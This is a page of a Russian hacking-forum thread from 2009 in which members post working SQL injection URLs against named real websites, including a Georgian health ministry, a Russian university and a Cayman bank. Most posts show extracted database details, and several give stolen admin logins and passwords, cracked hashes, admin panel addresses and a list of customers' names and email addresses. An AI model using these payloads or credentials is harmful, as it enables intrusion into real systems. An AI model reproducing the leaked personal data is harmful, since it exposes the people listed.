HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 882 из 1602 « Первая < 382782832872 878 879 880 881 882 883 884 885 886 8929329821382 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.04.2009, 15:56
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
С нами: 9035873

Репутация: 317
По умолчанию
<<Антивирусная школа - Новый источник IT знаний>> (:
Код:
http://av-school.ru/index.php?dn=blogs&to=comment&id=9999'+Union+sElecT+concat_ws(0x2a3a2a,%27%22%3E%3Ch1%3E%27,version(),database(),user(),@@version_compile_os)--+&mp
*:*5.1.11-beta*:*kav_system*:*kavsystem@localhost*:*portbld-freebsd6.2"
--------
Powered By Danneo RCMS
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 22.04.2009, 17:33
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами: 9288132

Репутация: 571
По умолчанию
Код:
http://www.silumin.kz/index.php?m=-259+union+select+1,2,3,version(),5,6,7,8--
Код:
http://www.football-plus.az/view_cat.php?cat=2'+and+substring(version(),1,1)=4--+
 
Ответить с цитированием

  #3  
Старый 22.04.2009, 21:57
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию
www.impact.org
Код:
http://www.impact.org/speakerprofile.php?id=-76+union+select+1,2,3,4,5,6,7,8--
version():5.0.67-community
user():impact_site@localhost
database():impact_devsite
 
Ответить с цитированием

  #4  
Старый 22.04.2009, 22:44
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию
http://www.dndrocketry.us/pages.php?id=6/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*

Database Version: 4.1.22-standard
Database name: dndrock_store
User name: dndrock_dnd@localhost

http://www.warrenfarrell.com/pages.php?id=-52/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

Database Version: 4.0.25
Database name: warren
User name: warren@localhost

http://www.buenachamba.com/pages.php?id=-20%27+union+select+1,user()/*

Database Version: 5.0.22
Database name: edemodb02
User name: edemouser02@localhost

pass к adminarea
mysql хеш:5f02164e65082b3e
Последний раз редактировалось Rubaka; 22.04.2009 в 23:57.. Причина: +
 
Ответить с цитированием

  #5  
Старый 23.04.2009, 00:13
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию
Цитата:
http://www.ideaborn.com/detalle.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-userstats-log
Database name: ideaborn_db
User name: ideaborn@ned.dreamhost.com

Login: admin
Pass: 81dc9bdb52d04dc20036dbd8313ed055 : 1234


Цитата:
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,4,5--
Database Version: 4.1.22-log
Database name: jobgoro9_pokebase
User name: jobgoro9_@localhost

email: pass
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,pass,concat_ws(0x3a,email)+fr om+users--


Цитата:
http://www.tvlab.com.ua/news/?id=-1+union+select+1,2,3,4--
Database Version: 5.0.51a
Database name: tvlab
User name: root@localhost


Шоп Багаж

Цитата:
http://bagazh-club.com.ua/index.php?m=06&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.51a-15-log
Database name: bagazhclub
User name: u_bagazhclub@localhost


Админка:

http://bagazh-club.com.ua/admin/

name: email: pswd

test:test@test.com:3213213213
test02:test02@mail.ru:2155456745
Иван Помидоров:ja-in-da-house@yandex.ru:654654654654
Федор Двинятин:test@mail.ru:384188998461
Сапармурат Ниязов:test@intechcentr.net:384188998461
123:ajegulsky@aaa.com:444586395834
Федор Иванов:abc@mail.ru:392703942157
Бла Бла:bla@mail.ru:271963550274
Людмила:mvadim@pisem.net:728109118270
Вадим:mvc@pur.ru:199490154267
Дмитрий:dimitriy_7@mail.ru:532843683176
Павел:arn_k@fromru.com:886098478852
Никита:nik-13-92@mail.ru:660344924172
Алла:allsolla@mail.ru:999999992222
Олег:Lichne@gmail.com:100509603544
алексей:alex_dem2008@mail.ru:335210418217
Инна:tebochka@ukr.net:614732119521
Последний раз редактировалось .:[melkiy]:.; 23.04.2009 в 00:31..
 
Ответить с цитированием

  #6  
Старый 23.04.2009, 04:48
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию
Offshore Banking|NCB Cayman Limited
Microsoft Access
Цитата:
http://ncbcayman.com/services.asp?service=1+union+select+1,2,3,4,5,6,7, 8,9,10,11+from+news
Доступа к MSysObjects как и к другим системным таблицам нету.Стоит админка,но её таблицу юзеров не подобрал.


Какой-то сайт граффити
Цитата:
http://workground.net/news9112008'+and+ascii(substring(user(),1,1))=109+--+.html
ИТД
->user() = master@localhost
Цитата:
http://workground.net/news9112008'+and+ascii(substring((select+1+from+ad min),1,1))=49+--+.html
таблица admin колонки login,pdw
в итоге
Код:
admin:enter2work
Админка:
Цитата:
http://workground.net/admin/
 
Ответить с цитированием

  #7  
Старый 23.04.2009, 13:05
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
С нами: 9093390

Репутация: 94
По умолчанию
Скуля на сайте http://www.healthministry.ge

Логин/пароль админа
http://www.healthministry.ge/eng/archive.php?Id=1994&act=full&catId=49+and+0+union+ select+1,2,3,4,concat_ws(0x3a,username,pass),6+fro m+moh_auth+limit+0,1+--+

Расшифровка логина/пароля:
moh:mohsmi7

Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: moh
User name: healthge@localhost

На сайте разрешено индексирование:
http://www.healthministry.ge/eng/

Привилегий на чтение файлов нет. Доступа к mysql.user нет.
 
Ответить с цитированием

  #8  
Старый 23.04.2009, 14:35
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами: 10339586

Репутация: 1396


По умолчанию
.museum =)
Цитата:
http://www.portail.wallonie.museum/en/map.php?id=-126+union+select+1,2,version(),4,5/*
Version: 5.0.45-community
User: aicim@swebdmz1.etnic.be
Dbname: mw
 
Ответить с цитированием

  #9  
Старый 23.04.2009, 15:42
WebGer
Новичок
Регистрация: 30.11.2008
Сообщений: 10
С нами: 9181823

Репутация: 25
По умолчанию
Официальный веб-сайт МГТУ им Н.Э.Баумана
http://bmstu.ru/history_pict.php?newsid='

Version: 5.0.45
User: bmstu_admin@localhost
Name: bmstu

Из интересного:
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+AdminUsers
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+wwwuser

Подбор таблиц:
http://bmstu.ru/history_pict.php?newsid=22+union+select+table_name ,table_schema+from+information_schema.tables+limit +39,30

Доступа к mysql.user нет.
Последний раз редактировалось WebGer; 23.04.2009 в 19:24..
 
Ответить с цитированием

  #10  
Старый 23.04.2009, 17:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Цитата:
Дает XSS
Любая инъекция "дает" ксс, так что не позорься.

Код:
http://www.xyxb.cn/chem.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10
xueyuan@localhost:xueyuan:5.0.45-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Код:
http://www.grimmauldplace.ru/hb.php?id=1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4
u161432@10.10.223.227:u161432:5.0.67-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Код:
http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6
f1300_7a2zB3mtwa@10.30.1.66:f1300_7a2zB3mt9L84:4.0 .27-log
Последний раз редактировалось mailbrush; 23.04.2009 в 17:31..
 
Ответить с цитированием
Ответ
Страница 882 из 1602 « Первая < 382782832872 878 879 880 881 882 883 884 885 886 8929329821382 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.